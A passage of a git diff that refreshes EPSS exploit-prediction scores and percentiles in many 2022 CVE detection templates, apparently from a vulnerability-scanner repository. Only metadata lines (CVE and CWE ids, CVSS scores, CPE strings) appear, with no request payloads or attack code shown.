cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index ef6432d2d2..3ac951038d 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32018 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 86d4079056..03882d0862 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32022 cwe-id: CWE-89 epss-score: 0.00773 - epss-percentile: 0.79045 + epss-percentile: 0.79265 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 75dd5560fa..1818a2a5ff 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32024 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 2a1648cb24..78ac51fc55 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32025 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 7c8d83ff89..4c30a2a482 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32026 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 83094f935a..685b6cc46c 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-32028 cwe-id: CWE-89 epss-score: 0.00618 - epss-percentile: 0.76135 + epss-percentile: 0.76396 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 7ebd9c0927..9844779dff 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32094 cwe-id: CWE-89 - epss-score: 0.01018 - epss-percentile: 0.81899 + epss-score: 0.01144 + epss-percentile: 0.83164 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 150fe4a483..2fc342839c 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32195 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.4045 + epss-percentile: 0.40841 cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index eb9add1445..cfc6dc40cd 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32409 cwe-id: CWE-22 - epss-score: 0.5824 - epss-percentile: 0.97277 + epss-score: 0.60663 + epss-percentile: 0.97396 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 0426048bcc..2370e8d0aa 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32429 cwe-id: CWE-287 - epss-score: 0.02276 - epss-percentile: 0.88224 + epss-score: 0.0395 + epss-percentile: 0.90972 cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index 2c1020d733..26e6f44e31 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-32444 cwe-id: CWE-601 - epss-score: 0.00285 - epss-percentile: 0.64698 + epss-score: 0.00197 + epss-percentile: 0.57268 cpe: cpe:2.3:a:yuba:u5cms:8.3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index db01ef2113..c6226c339a 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32770 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41266 + epss-percentile: 0.4157 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 6e0be3c7dd..139ffecd1c 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32771 cwe-id: CWE-79 epss-score: 0.00056 - epss-percentile: 0.21205 + epss-percentile: 0.21488 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index 34a5987cdf..cc568fcbba 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-32772 cwe-id: CWE-79 epss-score: 0.00056 - epss-percentile: 0.21205 + epss-percentile: 0.21488 cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index cc50190b75..befb8c7634 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-33119 cwe-id: CWE-79 - epss-score: 0.02006 - epss-percentile: 0.87424 + epss-score: 0.01051 + epss-percentile: 0.82367 cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 7af5c0ab0c..4575922fb8 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-33174 cwe-id: CWE-863 - epss-score: 0.00505 - epss-percentile: 0.73487 + epss-score: 0.00553 + epss-percentile: 0.74925 cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 84ab50d86e..48ed4227f4 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-33891 cwe-id: CWE-78 - epss-score: 0.97023 - epss-percentile: 0.99632 + epss-score: 0.96788 + epss-percentile: 0.99554 cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 43f3120f3a..d219f2fbc9 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-33901 - epss-score: 0.00713 - epss-percentile: 0.78038 + epss-score: 0.00812 + epss-percentile: 0.79842 cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 26c52cdbf5..29579bfd2a 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-33965 cwe-id: CWE-89 epss-score: 0.0098 - epss-percentile: 0.81511 + epss-percentile: 0.81714 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index f7fba31b34..bde946c0fb 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-34045 cwe-id: CWE-798 - epss-score: 0.02393 - epss-percentile: 0.8849 + epss-score: 0.02445 + epss-percentile: 0.88764 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index a67b6bb4ed..e5bd7019c7 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34046 cwe-id: CWE-863 - epss-score: 0.22828 - epss-percentile: 0.95888 + epss-score: 0.21264 + epss-percentile: 0.95854 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 158a3a876c..dd642c7646 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34047 cwe-id: CWE-668 - epss-score: 0.24505 - epss-percentile: 0.9601 + epss-score: 0.22865 + epss-percentile: 0.95955 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 30f6a907ca..16265f7adc 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-34048 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37601 + epss-percentile: 0.37966 cpe: cpe:2.3:o:wavlink:wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index 422d357e59..c6d989c2a0 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-34049 cwe-id: CWE-552 epss-score: 0.17531 - epss-percentile: 0.95436 + epss-percentile: 0.95511 cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 5d50f2a3fa..1d2a33aa54 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34121 cwe-id: CWE-829 - epss-score: 0.71421 - epss-percentile: 0.97623 + epss-score: 0.6982 + epss-percentile: 0.97631 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index a5f21f2eff..f59a90d6aa 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-34328 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40272 + epss-percentile: 0.40575 cpe: cpe:2.3:a:pmb_project:pmb:7.3.10:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index 8c402cd042..2061075b75 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -15,8 +15,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-34576 - epss-score: 0.01703 - epss-percentile: 0.86191 + epss-score: 0.01165 + epss-percentile: 0.83349 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 8eb5c44bba..51007bbe7a 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-34590 cwe-id: CWE-89 - epss-score: 0.00549 - epss-percentile: 0.74559 + epss-score: 0.00618 + epss-percentile: 0.76396 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 9ed2db4094..0607d28fb0 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-34753 cwe-id: CWE-78 - epss-score: 0.97007 - epss-percentile: 0.99625 + epss-score: 0.95784 + epss-percentile: 0.99232 cpe: cpe:2.3:o:schneider-electric:spacelogic_c-bus_home_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 910cc72466..7a25c418ab 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-3484 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29012 + epss-percentile: 0.29345 cpe: cpe:2.3:a:wpb_show_core_project:wpb_show_core:-:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 7ed150f35d..4e51328d22 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-3506 cwe-id: CWE-79 - epss-score: 0.00077 - epss-percentile: 0.31728 + epss-score: 0.00085 + epss-percentile: 0.3555 cpe: cpe:2.3:a:never5:related_posts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 460dcfcbe0..175dbccd25 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35151 cwe-id: CWE-79 - epss-score: 0.01162 - epss-percentile: 0.83115 + epss-score: 0.02006 + epss-percentile: 0.87578 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 1cd97a1d83..7d454807e7 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-35405 cwe-id: CWE-502 - epss-score: 0.97514 - epss-percentile: 0.99972 + epss-score: 0.97434 + epss-percentile: 0.99922 cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index f97f03812e..dbe25b6434 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-35413 cwe-id: CWE-798 - epss-score: 0.82988 - epss-percentile: 0.97987 + epss-score: 0.72577 + epss-percentile: 0.97711 cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index f05198b823..c8351f01c4 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-35416 cwe-id: CWE-79 epss-score: 0.00099 - epss-percentile: 0.40272 + epss-percentile: 0.40575 cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index 102e3eca3f..e38c92923f 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-35493 cwe-id: CWE-79 - epss-score: 0.00134 - epss-percentile: 0.47885 + epss-score: 0.00133 + epss-percentile: 0.47998 cpe: cpe:2.3:a:wrteam:eshop_-_ecommerce_\/_store_website:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index 288a7e6a0f..0728c05573 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-3578 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29012 + epss-percentile: 0.29345 cpe: cpe:2.3:a:metagauss:profilegrid:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index df730555e2..a7340f18af 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-35914 cwe-id: CWE-74 - epss-score: 0.9739 - epss-percentile: 0.9987 + epss-score: 0.96895 + epss-percentile: 0.99604 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index a7f33dfe14..213cb18569 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36446 cwe-id: CWE-116 - epss-score: 0.97228 - epss-percentile: 0.99749 + epss-score: 0.97117 + epss-percentile: 0.99706 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 665248998f..117bbdd602 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-36537 cwe-id: CWE-200 - epss-score: 0.96802 - epss-percentile: 0.99539 + epss-score: 0.93761 + epss-percentile: 0.98837 cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index a91bab8cdd..1d370088d4 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-36642 cwe-id: CWE-862 - epss-score: 0.74091 - epss-percentile: 0.97696 + epss-score: 0.69681 + epss-percentile: 0.9763 cpe: cpe:2.3:o:telosalliance:omnia_mpx_node_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index ee277ea98c..c52c6a4d73 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-36804 cwe-id: CWE-77 - epss-score: 0.97338 - epss-percentile: 0.99822 + epss-score: 0.97087 + epss-percentile: 0.99688 cpe: cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 4e0349e132..c02b0d5631 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-36883 cwe-id: CWE-862 epss-score: 0.01083 - epss-percentile: 0.825 + epss-percentile: 0.82673 cpe: cpe:2.3:a:jenkins:git:*:*:*:*:*:jenkins:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37042.yaml b/http/cves/2022/CVE-2022-37042.yaml index fd83b5a5bc..ca6633e214 100644 --- a/http/cves/2022/CVE-2022-37042.yaml +++ b/http/cves/2022/CVE-2022-37042.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-37042 cwe-id: CWE-22 - epss-score: 0.97489 - epss-percentile: 0.99954 + epss-score: 0.97438 + epss-percentile: 0.99927 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2022/CVE-2022-37153.yaml b/http/cves/2022/CVE-2022-37153.yaml index 109f896902..8a5d450c82 100644 --- a/http/cves/2022/CVE-2022-37153.yaml +++ b/http/cves/2022/CVE-2022-37153.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-37153 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.44709 + epss-score: 0.00099 + epss-percentile: 0.40575 cpe: cpe:2.3:a:articatech:artica_proxy:4.30.000000:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 22642b90fc..4c6691da4a 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-37190 cwe-id: CWE-732 - epss-score: 0.01712 - epss-percentile: 0.86233 + epss-score: 0.02309 + epss-percentile: 0.88455 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 21bb7f0720..dc9c432bb6 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-37191 cwe-id: CWE-829 - epss-score: 0.28873 - epss-percentile: 0.96273 + epss-score: 0.36609 + epss-percentile: 0.96686 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index e49f389f39..feebaf8868 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-37299 cwe-id: CWE-22 - epss-score: 0.00519 - epss-percentile: 0.73813 + epss-score: 0.00376 + epss-percentile: 0.69653 cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 34e1ef91de..1ee19f3e7e 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-3768 cwe-id: CWE-89 - epss-score: 0.02138 - epss-percentile: 0.87828 + epss-score: 0.01428 + epss-percentile: 0.85042 cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 3c2bbcc7a2..07bff4c801 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-3800 cwe-id: CWE-89,CWE-707 - epss-score: 0.04587 - epss-percentile: 0.91474 + epss-score: 0.04344 + epss-percentile: 0.91362 cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index 1898e9c35e..feb755ebaa 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38295 cwe-id: CWE-79 - epss-score: 0.00533 - epss-percentile: 0.74162 + epss-score: 0.00224 + epss-percentile: 0.60391 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index 58bac98117..a63410e949 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38296 cwe-id: CWE-434 - epss-score: 0.01161 - epss-percentile: 0.8311 + epss-score: 0.01424 + epss-percentile: 0.85023 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 7276d2328d..11c5c18a40 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38463 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.45824 + epss-score: 0.00141 + epss-percentile: 0.49561 cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index 4b1dfe2c0a..4d1169334d 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38467 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26173 + epss-score: 0.00071 + epss-percentile: 